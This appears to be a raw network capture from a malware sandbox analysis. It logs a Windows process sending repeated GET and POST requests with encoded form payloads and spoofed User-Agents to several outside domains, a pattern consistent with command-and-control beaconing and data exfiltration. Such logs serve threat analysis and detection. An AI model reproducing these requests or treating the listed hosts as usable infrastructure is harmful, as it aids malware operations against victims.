Jan 9, 2025 08:34:17.349061966 CET	918	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:17 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.11.20	49774	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:19.859879971 CET	538	OUT	GET /qps0/?cOnShP=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:34:20.049864054 CET	933	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:19 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.11.20	49775	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:35.674623013 CET	796	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 36 74 45 4b 62 36 65 41 75 4f 71 6d 4c 42 72 6e 63 57 42 4e 41 3d 3d Data Ascii: cOnShP=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
Jan 9, 2025 08:34:36.700869083 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:34:36 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.11.20	49776	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:38.513562918 CET	816	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 64 46 41 48 36 4d 63 6a 38 68 46 52 67 4c 4c 46 4e 32 68 55 3d Data Ascii: cOnShP=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
Jan 9, 2025 08:34:39.559170961 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:34:39 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.11.20	49777	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:41.349673986 CET	7965	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b [TRUNCATED] Data Ascii: cOnShP=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1CuMuzSBzrxIMLBMFYftk425bNsDqvOirrkINaBqH9HsWe6b/4s7zt3yNGhjUSXBT6fLuHV3bOpavh0hSUc9LNQYBbFXKOeZdF2HvsZxgDvNb+NAU3NdQ80UIcl7OsrsstZIZboQk7hRQFfq71SGO4tRGpYr4AAvJYB7kELtLRf8sc/XKzPJgU2cRCI0HlVldoKYvJCtlS7eWmt6rdghCkHY8hWAO4inU3/up73InoWYO1ZzU+wqvmDpkbQoRPPgKKzA/R2QqpCgxC8k6PWIr6GaZjmEjPhwRWlJt5JuoCrKcEpG6E1S4QxFCJvR9eYcvksT2G9m0zhhbkeYwm4faEMMMWchO1RKXRaGVfFomGfn6KgdUHFnQ3fnT+ZXl3JGwacKEQpzerZp+HrTvTz/U5qWVZA2LzbaUR8gHzeQnEWY430fZ0x+s1TirXALCgy2udthlheVtPTzz7z1lezsxt6UZsXlbQVTNJ5Q+B2eh3Jhi/rgCJVOE4slw9vew3dB/ZHtZn/7z+p1hdSn0oCJ4bMgDqh3Bzz2GWSQaYfducim0oFunMSBJs3IDRwYtUQTSmLmsR+C73u4trTk9BMwkdoW6J0A2PdOHT5q6qYHW5YJQ1p0FsQ2jVNNmaTNdIjVECmxlrwBqER1dS+tGtaqSXWeSu6UEP0VEvcVYt9oJWoDJQieVA24aiehWmTjRW/bVvZsjAzLWT3mI3U4Gimd2yINu82cVe45mqtIUBTDRGugBbJTR11wYsdI1YTWNnqLa5VI4QC+c3UCeyzy19RfDTl3Ooix/Ls5WI7J/+8r0z3o+Hmaa/s7hgUQpiZ2uH9ZPd6P9DVz/A8eovQ0AE4e63FNkxtIc+qXaDDe7 [TRUNCATED]
Jan 9, 2025 08:34:42.340070963 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:34:42 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.11.20	49778	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:44.188394070 CET	539	OUT	GET /nkmx/?cOnShP=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:34:45.197175980 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:34:45 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.11.20	49779	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:50.349009991 CET	799	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 35 57 2b 6b 55 78 57 39 43 4d 31 4f 46 58 67 30 4e 2b 33 48 77 3d 3d Data Ascii: cOnShP=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
Jan 9, 2025 08:34:50.485385895 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.11.20	49780	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:53.021311045 CET	819	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 66 45 46 4a 71 46 68 55 62 51 6b 58 78 4f 76 37 61 38 64 45 3d Data Ascii: cOnShP=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
Jan 9, 2025 08:34:53.158258915 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.11.20	49781	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:56.705024004 CET	2578	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 6a 39 30 54 6b 6d 6a 47 31 6a 35 35 45 55 76 32 31 56 44 62 61 4f 30 41 6e 37 2b 34 46 59 70 35 68 73 35 51 77 4a 44 37 6a 33 70 37 72 48 51 4a 41 55 32 78 36 4e 33 43 45 4d 68 77 46 6d 70 36 4b 30 41 66 54 79 58 59 61 50 62 6a 68 61 7a 7a 7a 36 36 66 32 4a 6a 67 52 6a 61 49 35 70 55 51 65 65 79 34 31 71 53 5a 62 65 79 64 4a 6c 64 53 6c 37 73 74 50 38 62 51 6e 77 69 30 54 35 4f 52 67 6d 6f 71 42 52 49 45 6d 77 4b 72 32 73 6f 52 70 76 6f 52 43 41 64 32 4f 61 78 6b 4c 55 6b 2f 5a 6b 64 6d 6a 55 4e 4c 79 65 58 55 76 53 4f 33 49 2b 42 32 69 71 4e 34 6a 48 71 37 74 59 35 61 4a 55 43 [TRUNCATED] Data Ascii: cOnShP=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwj90TkmjG1j55EUv21VDbaO0An7+4FYp5hs5QwJD7j3p7rHQJAU2x6N3CEMhwFmp6K0AfTyXYaPbjhazzz66f2JjgRjaI5pUQeey41qSZbeydJldSl7stP8bQnwi0T5ORgmoqBRIEmwKr2soRpvoRCAd2OaxkLUk/ZkdmjUNLyeXUvSO3I+B2iqN4jHq7tY5aJUCiiknmREZA9cZcJkDO2+6oD/LVa2d15kffj9dR6J5GJ07aWok6vBILgh79bpV52H+cR+RE+UczrNL+4F0/w+f4EeShNuSZAyM/94xHEvT1ze5ORCDvmft4wdGDmNiNBkcMbEqG8uyxdDWD49kiEFlR5Lrtao8BOfU0vPvkKhgVPJ6AgcIfM3hrlry9drRguaUok91QHWpywFR0fc9fUUK+LR5nrYHYRNsWpred7L7Kw8aw9VCan1w0kDZrppLXc9PKNe4z6E6QsbfA3orN/rzanbrZVtD3A46lioLf6j0hXFupgIe0UmmQBc+S8qMPedqF7Jodn+xK4UqThoSK+SEtY8umi+qmd5qNuB/mntP3zCGbNBtQfyXupVJCwsPzpLPToP2Hw6oCvhqhS5vCntXxHrwJkYMkKusSCoVzWHSm3VuqJeWGAQbAFLr7ASGlEA940EcKSKqMhARluC4d6MA4QwVGg722mHYfLDXQ7Ib5Vk/XZJrfCeJKJKK8iGxKX1nUtjgaA4hK0V+PHmn1P6H7rzG77xV6g2Q7OjIiIWCM3q1d22eIUVXXFtz8NhIAT4O5qVgW88go0uqbXlqak0PrLNo7VUC3Rmeyzcvu50RVcANF3Yz7+MEbYmGmGmfxM3xkT2aF+IELIP4osdI/4xP7xrpMQFk21H7YS [TRUNCATED]
Jan 9, 2025 08:34:56.705060005 CET	2578	OUT	Data Raw: 73 58 30 34 4f 73 69 79 32 2b 71 71 48 2b 59 6e 35 45 43 77 4c 4d 45 6a 2b 45 77 66 42 6e 44 33 79 63 31 69 74 44 2b 63 6d 4f 6d 77 53 66 77 77 55 54 55 2b 53 65 50 39 42 37 75 76 52 36 71 4a 6a 42 4b 4c 38 4a 58 68 62 6f 54 72 4d 37 43 45 2f 57 Data Ascii: sX04Osiy2+qqH+Yn5ECwLMEj+EwfBnD3yc1itD+cmOmwSfwwUTU+SeP9B7uvR6qJjBKL8JXhboTrM7CE/WLKXFxN1oxq4x3145yC29QWGt71TcHLBFXfLGEyHDrmAvmy94dJihsZnOJD8pg3/9TwDSXm6MTgSvKK4b7VwJ39ltDPo1H11NEKBhGIpkZCtGZ9o84PEhrDpChE3wpt7tKu42LIwVCRUKm4581LQFFYj6X3Ugs2BFm
Jan 9, 2025 08:34:56.841547012 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close
Jan 9, 2025 08:34:56.841845036 CET	2578	OUT	Data Raw: 38 49 76 30 73 71 45 4a 59 79 48 4a 39 54 58 2b 77 35 2f 56 45 6e 4b 74 45 71 74 36 2f 4b 53 56 76 79 62 67 68 76 4a 65 6c 47 46 50 68 42 6e 4a 77 46 65 64 67 30 6e 34 6c 61 6d 6e 49 6d 2b 72 53 34 58 71 57 57 4d 37 68 65 45 59 42 34 73 74 4a 4d Data Ascii: 8Iv0sqEJYyHJ9TX+w5/VEnKtEqt6/KSVvybghvJelGFPhBnJwFedg0n4lamnIm+rS4XqWWM7heEYB4stJMw/bAhQiGTjFlcntWbgoO1WmxLQrqR6N/BlIcfa1U/I/vmLTPqqzpR8xHv6jhRXbY2B4DxYTx6K+1sPkDjTmpgnAx6phri7sdAQ4M8UeLkOYZJlBGdoglkP3BtX7EiUVuE/cuL0LVW9+MnklIonoyp3vLhbgkrzBr1
Jan 9, 2025 08:34:56.841902018 CET	234	OUT	Data Raw: 57 62 50 69 61 53 67 55 44 6d 2b 59 49 30 78 32 2b 77 34 66 6e 55 59 76 78 36 52 62 32 44 32 5a 48 2b 31 38 62 30 77 2b 59 61 35 35 50 59 63 79 74 59 48 6e 6f 77 32 33 39 4c 78 55 6d 47 45 75 45 74 34 59 48 41 6d 75 48 7a 66 39 52 35 37 43 33 71 Data Ascii: WbPiaSgUDm+YI0x2+w4fnUYvx6Rb2D2ZH+18b0w+Ya55PYcytYHnow239LxUmGEuEt4YHAmuHzf9R57C3qyJFu0SuhTkQ3oKN7sHsxJDZWBmG2tVjeSQkFDkazO3PQu/OCOZEtTUb/oK+GYtdqWHvrnrA+M3Efv3KWBqY8sEavawTcWaxhfMCny64aR7mgJ6sIEvrWyFjuttpFDRSk7aCHX3DIhvKL2JwkvwOYWg==

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.11.20	49782	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:59.377386093 CET	540	OUT	GET /t3iv/?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
